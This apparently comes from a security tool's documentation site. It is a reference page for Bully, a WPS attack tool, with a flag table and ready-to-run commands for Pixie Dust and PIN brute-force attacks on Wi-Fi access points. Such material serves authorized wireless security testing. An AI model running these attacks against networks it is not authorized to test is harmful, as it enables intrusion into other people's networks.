Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.bytejmp.com/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Bully performs WPS PIN brute force and Pixie Dust attacks. Alternative to Reaver with different WPS state machine implementation — useful when Reaver fails or stalls on certain APs.

Install

sudo apt install bully

Usage

bully <interface> -b <BSSID> [options]
FlagDescription
-b <BSSID>Target AP MAC address
-c <channel>Target channel
-dEnable Pixie Dust attack
-v <1-3>Verbosity level (3 = max)
-p <PIN>Try specific PIN
-s <PIN>Start brute force from PIN
-e <ESSID>Target SSID
-t <sec>Timeout per attempt
-l <sec>Delay between attempts
-r <count>Retries before giving up
-5Use M5/M7 nack to skip half-PIN
-BBruteforce the BSSID

Pixie Dust Attack

sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -d -v 3

PIN Brute Force

sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -v 3

Resume from Specific PIN

sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -s 12340000 -v 3

Tune for Slow APs

sudo bully wlan0mon -b <BSSID> -c <CHANNEL> -l 5 -r 3 -v 3